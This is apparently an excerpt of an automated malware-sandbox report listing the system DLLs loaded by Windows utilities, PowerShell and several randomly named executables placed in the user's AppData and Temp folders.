                      Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
